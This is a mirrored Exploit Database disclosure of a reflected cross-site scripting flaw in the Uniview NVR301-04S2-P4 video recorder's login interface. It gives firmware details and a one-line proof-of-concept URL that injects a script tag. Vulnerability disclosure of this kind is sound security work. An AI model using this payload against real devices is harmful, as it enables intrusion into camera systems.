Uniview NVR301-04S2-P4 – Reflected Cross-Site Scripting (XSS)

• Exploit Database
• 16 阅读

• 作者： Bleron Rrustemi
  日期： 2023-03-29
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51130/

• # Exploit Title: Uniview NVR301-04S2-P4 - Reflected Cross-Site Scripting (XSS)
  # Author: Bleron Rrustemi
  # Discovery Date: 2022-11-15
  # Vendor Homepage: https://www.uniview.com/tr/Products/NVR/Easy/NVR301-04S2-P4/
  # Datasheet:: https://www.uniview.com/download.do?id=1761643
  # Device Firmware: NVR-B3801.20.15.200829
  # Tested Version: NVR301-04S2-P4
  # Tested on: Windows 10 Enterprise LTSC 64\Firefox 106.0.5 (64-bit)
  # Vulnerability Type: Reflected Cross-Site Scripting (XSS)
  # CVE: N/A
  
   
  
   
  
  # Proof of Concept:
  
  IP=IP of the device
  
  http://IP/LAPI/V1.0/System/Security/Login/"><script>alert('1')</script>
  
   
  
  Best regards,
  
  Bleron Rrustemi
  Chief Technology Officer
  Direct: +383 (0) 49 955 503
  E-mail:<mailto:bleron@drugeza.com> bleron@drugeza.com
  
  
  
   <http://> 
  
  Drugëza SHPK
  Rr. Lekë Dukagjini p.n
  Prishtinë, 10000 • Kosovo
  ​Tel.: +383 49 955 503
  www.drugeza.com
  ​
  
   
  
  ü Be GREEN, keep it on the SCREEN